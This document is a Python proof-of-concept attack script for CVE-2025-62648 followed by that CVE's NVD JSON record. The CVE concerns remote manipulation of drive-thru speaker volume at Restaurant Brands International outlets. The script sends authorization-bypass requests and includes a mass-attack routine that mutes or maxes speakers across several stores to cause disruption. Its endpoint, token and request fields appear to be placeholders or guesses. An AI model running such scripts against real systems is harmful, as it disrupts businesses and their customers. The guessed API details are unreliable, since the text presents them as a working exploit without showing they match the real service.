CVE-2025-62648

# CVE-2025-62648 PoC - RBI Assistant Platform Drive Thru Speaker Volume Manipulation # This PoC demonstrates how a remote attacker with low privileges can # adjust Drive Thru speaker audio volume on the RBI assistant platform. import requests import json # Target RBI Assistant Platform API endpoint TARGET_URL = "https://rbi-assistant-api.example.com/v1/drive-thru/volume" # Low-privilege credentials obtained by the attacker # (PR:L - Low privileges required per CVSS vector) ATTACKER_TOKEN = "low_privilege_session_token_here" # Store ID of the target restaurant STORE_ID = "BK_STORE_12345" def adjust_drive_thru_volume(store_id, volume_level, auth_token): """ Adjust the Drive Thru speaker volume for a specific store. :param store_id: The ID of the target store (e.g., Burger King, Tim Hortons) :param volume_level: Desired volume level (0-100) :param auth_token: Authentication token (low-privilege token is sufficient) :return: Response from the server """ headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } payload = { "store_id": store_id, "device_type": "drive_thru_speaker", "volume": volume_level, "action": "set_volume" } try: response = requests.post(TARGET_URL, headers=headers, json=payload, timeout=10) if response.status_code == 200: print(f"[+] Successfully adjusted volume for store {store_id} to {volume_level}%") print(f"[+] Response: {response.text}") return response.json() else: print(f"[-] Failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def mass_volume_attack(store_ids, volume_level): """ Perform a mass attack across multiple RBI-owned stores. :param store_ids: List of store IDs to target :param volume_level: Volume level to set (e.g., 0 for mute, 100 for max) """ for store_id in store_ids: print(f"\n[*] Targeting store: {store_id}") result = adjust_drive_thru_volume(store_id, volume_level, ATTACKER_TOKEN) if result: print(f"[+] Store {store_id} volume successfully modified") if __name__ == "__main__": # Example: Set volume to 0 (mute) on target stores - causing Drive Thru disruption target_stores = ["BK_STORE_12345", "TH_STORE_67890", "PL_STORE_11111"] # Attack: mute all Drive Thru speakers mass_volume_attack(target_stores, volume_level=0) # Or alternatively, set to maximum volume to cause disturbance # mass_volume_attack(target_stores, volume_level=100) # Note: This vulnerability demonstrates a lack of proper authorization # checks on the RBI platform's device management API. # The Scope Changed (S:C) in the CVSS vector indicates that exploitation # could potentially lead to access of other platform functionalities.

{"cve": {"id": "CVE-2025-62648", "sourceIdentifier": "[email protected]", "published": "2025-10-17T21:15:37.997", "lastModified": "2025-10-31T18:39:34.913", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "The Restaurant Brands International (RBI) assistant platform through 2025-09-06 allows remote attackers to adjust Drive Thru speaker audio volume."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rbi:restaurant_brands_international_assistant:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-09-06", "matchCriteriaId": "706D04A1-2EDB-4713-BA47-EFDC8A86FBA3"}]}]}], "references": [{"url": "https://archive.today/fMYQp", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://bobdahacker.com/blog/rbi-hacked-drive-thrus/", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://web.archive.org/web/20250906134240/https:/bobdahacker.com/blog/rbi-hacked-drive-thrus", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.malwarebytes.com/blog/news/2025/09/popeyes-tim-hortons-burger-king-platforms-have-catastrophic-vulnerabilities-say-hackers", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": "https://www.yahoo.com/news/articles/burger-king-hacked-attackers-impressed-124154038.html", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}]}}